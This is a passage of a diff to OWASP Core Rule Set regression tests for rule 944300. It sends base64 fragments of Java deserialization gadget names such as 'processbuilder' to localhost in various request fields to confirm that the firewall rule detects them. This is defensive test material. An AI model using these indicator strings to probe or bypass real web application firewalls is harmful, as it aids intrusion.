expect_ids: [944300] + - test_id: 42 desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log: + expect_ids: [944300] + - test_id: 43 desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 45 desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 46 desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log: + expect_ids: [944300] + - test_id: 47 desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb2Nlc3NidWlsZGVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 48 desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb2Nlc3NidWlsZGVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 49 desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb2Nlc3NidWlsZGVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 50 desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 51 desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 52 desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 53 desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log: + expect_ids: [944300] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 56 desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 57 desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log: + expect_ids: [944300] + - test_id: 58 desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 59 desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm9jZXNzYnVpbGRlcg=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 60 desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm9jZXNzYnVpbGRlcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 61 desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 62 desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 63 desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 64 desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log: + expect_ids: [944300] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 67 desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 68 desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 